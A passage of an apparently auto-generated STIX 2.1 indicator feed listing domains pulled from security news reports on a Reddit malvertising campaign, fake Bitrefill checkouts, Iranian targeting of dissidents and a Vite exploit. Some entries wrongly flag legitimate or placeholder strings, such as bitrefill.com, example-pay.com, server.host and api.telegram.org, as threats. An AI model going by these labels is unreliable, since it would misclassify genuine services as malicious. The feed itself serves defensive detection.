Context: : api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best","pattern":"[domain-name:value = 'storjshare.io']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--adaeddd5-5c1c-4ff8-a9e1-b5c259eec71d","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: vultrobjects.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: nvestigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Miti","pattern":"[domain-name:value = 'vultrobjects.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--16362e8b-0435-4577-9df9-f0146dabf5fe","created":"2026-09-15T11:51:03.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ember-bridge.com","description":"Seen in \"HBO Max’s verified Reddit account hijacked to spread malware\" (Malwarebytes Labs). Context: lution with a web protection component. Malwarebytes blocks ember-bridge.com, which is part of the PasteSwitch infrastructure. Educate y","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-15T11:51:03.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/news/2026/09/hbo-maxs-verified-reddit-account-hijacked-to-spread-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5e22946d-9273-4d11-959b-ea7d0fe78090","created":"2026-09-15T11:12:32.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: server.host","description":"Seen in \"Mass-Scanning Campaign Exploits Vite Flaw to Extract Cloud Credentials From Exposed Dev Servers\" (The Hacker News). Context: exposes the Vite dev server to the network using --host or server.host config option The sensitive file exists in the allowed dire","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-15T11:12:32.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/mass-scanning-campaign-exploits-vite.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f1f21e85-a957-49e7-b24f-3c5b62028ef6","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: clean-disk-guide.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: oke down into 15 ads for a fake macOS disk utility at apple.clean-disk-guide[.]com and 11 for other developer tools at code-desktop[.]com. O","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--67e5bd31-573a-42ba-bcaf-bd949e2474d7","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: code-desktop.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: .clean-disk-guide[.]com and 11 for other developer tools at code-desktop[.]com. One entry point into a larger system The HBO Max ads wer","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3a290899-1d79-442d-9561-de612f2bc6b0","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: codex-craft.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: -macos[.]com. Another 36 posed as OpenAI Codex, pointing to codex-craft[.]com. The rest broke down into 15 ads for a fake macOS disk ut","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--67728e11-5262-4ade-add9-7c148a0c44e5","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomax-macos.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: s, 46 used an HBO Max lure, split between hbomaxx[.]app and hbomax-macos[.]com. Another 36 posed as OpenAI Codex, pointing to codex-craf","pattern":"[domain-name:value = 'hbomax-macos.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8aa2247d-a51a-4d3f-a4c0-16dc0689f53d","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomaxx.app","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: id . Of the 108 ads, 46 used an HBO Max lure, split between hbomaxx[.]app and hbomax-macos[.]com. Another 36 posed as OpenAI Codex,","pattern":"[domain-name:value = 'hbomaxx.app']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--99ce2342-b68c-4823-b62b-bffbf14ea0c3","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomaxx.us","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: HBO Max subreddits,” wrote the user. Clicking the ad led to hbomaxx[.]us, “which looks somewhat legitimate, and has a join button","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a3e0fd1d-fda0-42b0-915c-4e5dcec34d76","created":"2026-09-15T09:09:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hbomaxx.us","description":"Seen in \"Hacked HBO Max Reddit Account Used for Malware Delivery via ClickFix Attack\" (SecurityWeek). Context: ich does not exist. Clicking the malicious ads led users to hbomaxx[.]us, a page mimicking the official HBO Max site that also con","pattern":"[domain-name:value = 'hbomaxx.us']","pattern_type":"stix","valid_from":"2026-09-15T09:09:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/hacked-hbo-reddit-account-used-for-malware-delivery-via-clickfix-attack/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a76dcc6-1583-4fab-870f-5de2504831f2","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: biterflll.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y tips in seconds. Indicators of compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com b","pattern":"[domain-name:value = 'biterflll.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--76a5c2e3-61ef-4544-801d-cf34bdc1f313","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitigift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: s. Indicators of compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.","pattern":"[domain-name:value = 'bitigift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--339e53da-512f-41a5-a3e0-3d168186a8b7","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitrefall.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: f compromise (IOCs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.","pattern":"[domain-name:value = 'bitrefall.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1622de53-5e92-4595-bdff-6835901ae912","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ed or charged back. Confirm that the main domain is exactly bitrefill.com before approving a payment. Be wary of domains containing a","pattern":"[domain-name:value = 'bitrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5c86a760-a415-40be-a41d-37ef0234359c","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitrefill-payments.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: Cs) Domains: biterflll[.]com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitr","pattern":"[domain-name:value = 'bitrefill-payments.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f83661e8-352e-46f3-82a5-b65eac6c469c","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitrefill-pays.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: com bitigift[.]com bitrefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[","pattern":"[domain-name:value = 'bitrefill-pays.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1249bae2-af9c-4146-851a-679290ff36e1","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitregift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: trefall[.]com bitrefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[","pattern":"[domain-name:value = 'bitregift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1d2b84a3-afcc-44ee-a29f-0d29ef6e1e1c","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitregill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: trefill-payments[.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[","pattern":"[domain-name:value = 'bitregill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fe82e73d-fc73-4e72-985e-ad6948485b5b","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitretill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: [.]com bitrefill-pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[","pattern":"[domain-name:value = 'bitretill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bbdc1960-0126-48cf-b8b8-f670a8e72418","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitrgift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: -pays[.]com bitregift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill","pattern":"[domain-name:value = 'bitrgift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e135c280-d248-44db-88d7-b820b1bdbc02","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitrgifts.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: regift[.]com bitregill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitre","pattern":"[domain-name:value = 'bitrgifts.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a9df5563-cca6-48bb-b0ce-84929b8d71a5","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitrnfill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: regill[.]com bitretill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-b","pattern":"[domain-name:value = 'bitrnfill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1a76ed7e-5c43-4593-8b1c-b6bb5eaf9e62","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bitruflli.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: retill[.]com bitrgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pa","pattern":"[domain-name:value = 'bitruflli.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--433ee079-a298-4775-8a07-2238822d6a6a","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: butrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: rgift[.]com bitrgifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]co","pattern":"[domain-name:value = 'butrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--931d699c-50f4-44ab-8a0c-5c17a2dd8d45","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: example-pay.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y’s main domain, as in pay.example.com . An address such as example-pay.com is a completely separate domain that anyone could register.","pattern":"[domain-name:value = 'example-pay.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5707a5f2-8118-4f26-a6af-75a581625bcc","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: pay-bitigift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefl","pattern":"[domain-name:value = 'pay-bitigift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a56b04f5-fb68-4ddc-b681-22ed015bb080","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: pay-bitregill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: gifts[.]com bitrnfill[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]co","pattern":"[domain-name:value = 'pay-bitregill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7db3a2af-d27b-4e3a-b295-880fb2cb064a","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: pay-bitrgift.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: l[.]com bitruflli[.]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]co","pattern":"[domain-name:value = 'pay-bitrgift.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--095de43b-c817-4e67-ad89-82e11962c0d6","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: pay-bitrgifts.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: ]com butrefill[.]com pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.","pattern":"[domain-name:value = 'pay-bitrgifts.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--62a0b223-331e-461f-8191-90a154783339","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: pay-butrefill.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitregill[.]com pay-bitrgift[.]com pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2","pattern":"[domain-name:value = 'pay-butrefill.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4759505c-2180-4c3b-82ef-b8c71db6d512","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xn--bitrefll-71a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: pay-bitrgifts[.]com pay-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bit","pattern":"[domain-name:value = 'xn--bitrefll-71a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e1f8d82b-b988-4f3e-b125-08286adb4961","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xn--bitrefll-h2a.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: y-butrefill[.]com pay-bitigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn-","pattern":"[domain-name:value = 'xn--bitrefll-h2a.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fbf77404-54ed-4abd-892f-70454fff4911","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xn--bitrefll-pay-kfb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: itigift[.]com xn--bitrefll-71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bit","pattern":"[domain-name:value = 'xn--bitrefll-pay-kfb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/threat-intel/2026/09/search-results-are-sending-people-to-fake-bitrefill-checkouts"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--95000a2b-aa84-4d7d-8877-6835ef8952a6","created":"2026-09-15T08:40:22.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xn--bitrefll-pay-xfb.com","description":"Seen in \"Search results are sending people to fake Bitrefill checkouts\" (Malwarebytes Labs). Context: 71a[.]com xn--bitrefll-h2a[.]com xn--bitrefll-pay-kfb[.]com xn--bitrefll-pay-xfb[.]com xn--bitrefll-q2a[.]com xn--bitreill-cz9c[.]com xn--bitrei","pattern":"[domain-name:value = 'xn--bitrefll-pay-xfb.com']","pattern_type":"stix","valid_from":"2026-09-15T08:40:22.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Malwarebytes 